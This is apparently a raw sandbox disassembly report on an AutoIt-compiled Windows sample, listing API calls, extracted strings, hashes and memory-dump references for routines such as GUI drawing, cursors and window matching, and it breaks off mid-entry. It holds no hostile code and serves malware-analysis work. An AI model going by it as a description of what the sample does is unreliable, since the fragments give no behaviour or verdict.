                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              • Opcode ID: ed584b06a404e6b9d02689a6c1eb271e32b7b169920adb9e1aa068590e5be02d
                                              • Instruction ID: 78aec563e34a3e3db0a56e43f58baadfc1fe70bac6e7fbaebbfed56ff6de2e8c
                                              • Opcode Fuzzy Hash: ed584b06a404e6b9d02689a6c1eb271e32b7b169920adb9e1aa068590e5be02d
                                              • Instruction Fuzzy Hash: 9C5190B2649A09AF8F1FEB14CD92CBD73A5EB0A700B204457E507AB691CB31AD05DB53
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 1038674560-86951937
                                              • Opcode ID: 7b573027ae4702a2bee773c3408e809c74bf1d31a59888cab0c400d5bcea1605
                                              • Instruction ID: 085e1ea62f5966f1ca8e1ddb9331dacbd6fd7f86c3f57d3d482ccfdeb50ef907
                                              • Opcode Fuzzy Hash: 7b573027ae4702a2bee773c3408e809c74bf1d31a59888cab0c400d5bcea1605
                                              • Instruction Fuzzy Hash: 5881E9B16006056ADB23AF60EC43FBF37A8EF16700F048025F905AF196EB75EE45D662
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003C9AD2
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003C9B8B
                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 003C9BA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: 0
                                              • API String ID: 2326795674-4108050209
                                              • Opcode ID: bf60f8f631730cba0bd92cf75bf461edd6c749c75406620487e9b38afe502550
                                              • Instruction ID: 97b2cfc095254da581e0f4cbf8ec2749fbf0aa798ff91393ef4b13bf2d75576a
                                              • Opcode Fuzzy Hash: bf60f8f631730cba0bd92cf75bf461edd6c749c75406620487e9b38afe502550
                                              • Instruction Fuzzy Hash: 2B02AC31108201AFE726CF24C849FAABBE9FF49314F06852EF999D62A1C735DD54CB52
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 003CA903
                                              • SetTextColor.GDI32(?,?), ref: 003CA907
                                              • GetSysColorBrush.USER32(0000000F), ref: 003CA91D
                                              • GetSysColor.USER32(0000000F), ref: 003CA928
                                              • CreateSolidBrush.GDI32(?), ref: 003CA92D
                                              • GetSysColor.USER32(00000011), ref: 003CA945
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003CA953
                                              • SelectObject.GDI32(?,00000000), ref: 003CA964
                                              • SetBkColor.GDI32(?,00000000), ref: 003CA96D
                                              • SelectObject.GDI32(?,?), ref: 003CA97A
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 003CA999
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003CA9B0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 003CA9C5
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003CA9ED
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003CAA14
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 003CAA32
                                              • DrawFocusRect.USER32(?,?), ref: 003CAA3D
                                              • GetSysColor.USER32(00000011), ref: 003CAA4B
                                              • SetTextColor.GDI32(?,00000000), ref: 003CAA53
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003CAA67
                                              • SelectObject.GDI32(?,003CA5FA), ref: 003CAA7E
                                              • DeleteObject.GDI32(?), ref: 003CAA89
                                              • SelectObject.GDI32(?,?), ref: 003CAA8F
                                              • DeleteObject.GDI32(?), ref: 003CAA94
                                              • SetTextColor.GDI32(?,?), ref: 003CAA9A
                                              • SetBkColor.GDI32(?,?), ref: 003CAAA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 1996641542-0
                                              • Opcode ID: 006d13e800a50436dc8c66b4f080ed89d3e56b63901ded39ed715e55f30a2822
                                              • Instruction ID: 0aba533eccb89560bc015b1e960ed4537c1d7a8d5bab8894c0b88815b401e7d3
                                              • Opcode Fuzzy Hash: 006d13e800a50436dc8c66b4f080ed89d3e56b63901ded39ed715e55f30a2822
                                              • Instruction Fuzzy Hash: 2F512B71900618EFDB129FA4DC49EAE7BBAEB08320F154625F911EB2A1D771AD40DB90
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003C8AC1
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C8AD2
                                              • CharNextW.USER32(0000014E), ref: 003C8B01
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003C8B42
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003C8B58
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C8B69
                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003C8B86
                                              • SetWindowTextW.USER32(?,0000014E), ref: 003C8BD8
                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003C8BEE
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C8C1F
                                              • _memset.LIBCMT ref: 003C8C44
                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003C8C8D
                                              • _memset.LIBCMT ref: 003C8CEC
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003C8D16
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 003C8D6E
                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 003C8E1B
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 003C8E3D
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C8E87
                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C8EB4
                                              • DrawMenuBar.USER32(?), ref: 003C8EC3
                                              • SetWindowTextW.USER32(?,0000014E), ref: 003C8EEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                              • String ID: 0
                                              • API String ID: 1073566785-4108050209
                                              • Opcode ID: 42168d615b8aefad9d255c5b6748298f14e282e58faf855bd51ce6c286e2ff41
                                              • Instruction ID: 25344ef805854ad5aa27aba7a4de6f86f990aee3ae9c768e6a6a70c40089992e
                                              • Opcode Fuzzy Hash: 42168d615b8aefad9d255c5b6748298f14e282e58faf855bd51ce6c286e2ff41
                                              • Instruction Fuzzy Hash: 65E15B75900218AEDB229F64CC84FEE7BB9EF09710F11815EF915EA290DB709E81DF60
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 003C49CA
                                              • GetDesktopWindow.USER32 ref: 003C49DF
                                              • GetWindowRect.USER32(00000000), ref: 003C49E6
                                              • GetWindowLongW.USER32(?,000000F0), ref: 003C4A48
                                              • DestroyWindow.USER32(?), ref: 003C4A74
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003C4A9D
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C4ABB
                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003C4AE1
                                              • SendMessageW.USER32(?,00000421,?,?), ref: 003C4AF6
                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003C4B09
                                              • IsWindowVisible.USER32(?), ref: 003C4B29
                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003C4B44
                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003C4B58
                                              • GetWindowRect.USER32(?,?), ref: 003C4B70
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 003C4B96
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 003C4BB0
                                              • CopyRect.USER32(?,?), ref: 003C4BC7
                                              • SendMessageW.USER32(?,00000412,00000000), ref: 003C4C32
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: c124fea1182b9f13efbeffd44bd55ebb6f450d223f8f15c4de2f1c252b69de8b
                                              • Instruction ID: 56e7237c23f119d6790b7104de168182d567e414a741727e16111e5922f687ee
                                              • Opcode Fuzzy Hash: c124fea1182b9f13efbeffd44bd55ebb6f450d223f8f15c4de2f1c252b69de8b
                                              • Instruction Fuzzy Hash: 19B15871604340AFDB06DF64C898F6ABBE9AF88314F00891DF999DB2A1D771EC05CB95
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003A44AC
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003A44D2
                                              • _wcscpy.LIBCMT ref: 003A4500
                                              • _wcscmp.LIBCMT ref: 003A450B
                                              • _wcscat.LIBCMT ref: 003A4521
                                              • _wcsstr.LIBCMT ref: 003A452C
                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003A4548
                                              • _wcscat.LIBCMT ref: 003A4591
                                              • _wcscat.LIBCMT ref: 003A4598
                                              • _wcsncpy.LIBCMT ref: 003A45C3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 699586101-1459072770
                                              • Opcode ID: ff69dba5c01daed615c4881e462e830bd173fb0070c4f7a94c25b52a932ff229
                                              • Instruction ID: 0239960c095874f0559db2c14441ff8574abc295f4a180d294694a75e2627a2e
                                              • Opcode Fuzzy Hash: ff69dba5c01daed615c4881e462e830bd173fb0070c4f7a94c25b52a932ff229
                                              • Instruction Fuzzy Hash: 0A41F731A002047FDB17AB758C47EFF776CDF82710F00446AFA05EA192EB75AA0197A9
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003428BC
                                              • GetSystemMetrics.USER32(00000007), ref: 003428C4
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003428EF
                                              • GetSystemMetrics.USER32(00000008), ref: 003428F7
                                              • GetSystemMetrics.USER32(00000004), ref: 0034291C
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00342939
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00342949
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0034297C
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00342990
                                              • GetClientRect.USER32(00000000,000000FF), ref: 003429AE
                                              • GetStockObject.GDI32(00000011), ref: 003429CA
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 003429D5
                                                • Part of subcall function 00342344: GetCursorPos.USER32(?), ref: 00342357
                                                • Part of subcall function 00342344: ScreenToClient.USER32(004057B0,?), ref: 00342374
                                                • Part of subcall function 00342344: GetAsyncKeyState.USER32(00000001), ref: 00342399
                                                • Part of subcall function 00342344: GetAsyncKeyState.USER32(00000002), ref: 003423A7
                                              • SetTimer.USER32(00000000,00000000,00000028,00341256), ref: 003429FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: f94866d7730cb827c780a50bd92f53e197a8741d290ead840e0bc1e6cb5cd94e
                                              • Instruction ID: 0480966192f2b4a4a9e1861e2bcbf8910786f59a559fd1a1d25d11a7922678f6
                                              • Opcode Fuzzy Hash: f94866d7730cb827c780a50bd92f53e197a8741d290ead840e0bc1e6cb5cd94e
                                              • Instruction Fuzzy Hash: 73B17D7160020ADFDB16EFA8CC45BAE7BB9FB48310F518129FA15EB290DB74A850CF54
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0039A47A
                                              • __swprintf.LIBCMT ref: 0039A51B
                                              • _wcscmp.LIBCMT ref: 0039A52E
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0039A583
                                              • _wcscmp.LIBCMT ref: 0039A5BF
                                              • GetClassNameW.USER32(?,?,00000400), ref: 0039A5F6
                                              • GetDlgCtrlID.USER32(?), ref: 0039A648
                                              • GetWindowRect.USER32(?,?), ref: 0039A67E
                                              • GetParent.USER32(?), ref: 0039A69C
                                              • ScreenToClient.USER32(00000000), ref: 0039A6A3
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0039A71D
                                              • _wcscmp.LIBCMT ref: 0039A731
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0039A757
                                              • _wcscmp.LIBCMT ref: 0039A76B
                                                • Part of subcall function 0036362C: _iswctype.LIBCMT ref: 00363634
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                              • String ID: %s%u
                                              • API String ID: 3744389584-679674701
                                              • Opcode ID: b3da6c3cfd62abdc2121007177da8b53422183fefa59c181f0eabf3b52698550
                                              • Instruction ID: 48b6ef226fb5e130556d8dabd4b1a451a928b3f921b0c7138a5d0fd7a8f8ab2f
                                              • Opcode Fuzzy Hash: b3da6c3cfd62abdc2121007177da8b53422183fefa59c181f0eabf3b52698550
                                              • Instruction Fuzzy Hash: 21A1EF31204B06AFDB16DFA4C885FAAB7E8FF44314F008629F999C6190DB30E955CBD2
                                              APIs
                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0039AF18
                                              • _wcscmp.LIBCMT ref: 0039AF29
                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0039AF51
                                              • CharUpperBuffW.USER32(?,00000000), ref: 0039AF6E
                                              • _wcscmp.LIBCMT ref: 0039AF8C
                                              • _wcsstr.LIBCMT ref: 0039AF9D
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0039AFD5
                                              • _wcscmp.LIBCMT ref: 0039AFE5
                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0039B00C
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0039B055
                                              • _wcscmp.LIBCMT ref: 0039B065
                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0039B08D
                                              • GetWindowRect.USER32(00000004,?), ref: 0039B0F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                              • String ID: @$ThumbnailClass
                                              • API String ID: 1788623398-1539354611
                                              • Opcode ID: 29b805c097c8434ae20ea2f267de2314d3bdb05a317783ab53f54274837f3cda
                                              • Instruction ID: 1157e603753ef71af6df9e5d7ff6acc8ab7409ba9b3eaf54923688716bc10065
                                              • Opcode Fuzzy Hash: 29b805c097c8434ae20ea2f267de2314d3bdb05a317783ab53f54274837f3cda
                                              • Instruction Fuzzy Hash: 8781E1711082059FDF02DF14D985FAABBECEF44314F04856AFD868A096DB30ED49CBA1
                                              APIs
                                                • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                              • DragQueryPoint.SHELL32(?,?), ref: 003CC627
                                                • Part of subcall function 003CAB37: ClientToScreen.USER32(?,?), ref: 003CAB60
                                                • Part of subcall function 003CAB37: GetWindowRect.USER32(?,?), ref: 003CABD6
                                                • Part of subcall function 003CAB37: PtInRect.USER32(?,?,003CC014), ref: 003CABE6
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 003CC690
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003CC69B
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003CC6BE
                                              • _wcscat.LIBCMT ref: 003CC6EE
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003CC705
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 003CC71E
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 003CC735
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 003CC757
                                              • DragFinish.SHELL32(?), ref: 003CC75E
                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003CC851
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb@
                                              • API String ID: 169749273-4025947017
                                              • Opcode ID: c8c53b73610f10fa865f64f4581e0e6f60ae117b0a688be5e77d0eb5be8012ee
                                              • Instruction ID: 5a8b1d16598a4cfc2812773d9fd7a52d09a46ca466512320537ed6e59cb07d6e
                                              • Opcode Fuzzy Hash: c8c53b73610f10fa865f64f4581e0e6f60ae117b0a688be5e77d0eb5be8012ee
                                              • Instruction Fuzzy Hash: 47616271508304AFC702EF64DC85EAFBBE9EF89710F00092EF595DA1A1DB70A949CB52
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                              • API String ID: 1038674560-1810252412
                                              • Opcode ID: 1deda77ee8576233fbc3eb85a35e34c96a501abc4ad67bda402c44d6d41b17ae
                                              • Instruction ID: 3228463c45aba816e77f5f34b689aaf44d84edbdd488293e26ffc04deeb016e1
                                              • Opcode Fuzzy Hash: 1deda77ee8576233fbc3eb85a35e34c96a501abc4ad67bda402c44d6d41b17ae
                                              • Instruction Fuzzy Hash: 1731B031948609ABDF13FA60DE03EFE77A8AB10750F210128F501BD1D6EB517F148A92
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 003B5013
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 003B501E
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 003B5029
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 003B5034
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 003B503F
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 003B504A
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 003B5055
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 003B5060
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 003B506B
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 003B5076
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 003B5081
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 003B508C
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 003B5097
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 003B50A2
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 003B50AD
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 003B50B8
                                              • GetCursorInfo.USER32(?), ref: 003B50C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Cursor$Load$Info
                                              • String ID:
                                              • API String ID: 2577412497-0
                                              • Opcode ID: 44092b76e2756ad7faee56fdf335d07ed7bf3eca9c1c678fff9ea388d694ee98
                                              • Instruction ID: c6c075561976878960f4d8771deca6c7979fa71bdbc1c826c1d2ad7f320f3aa6
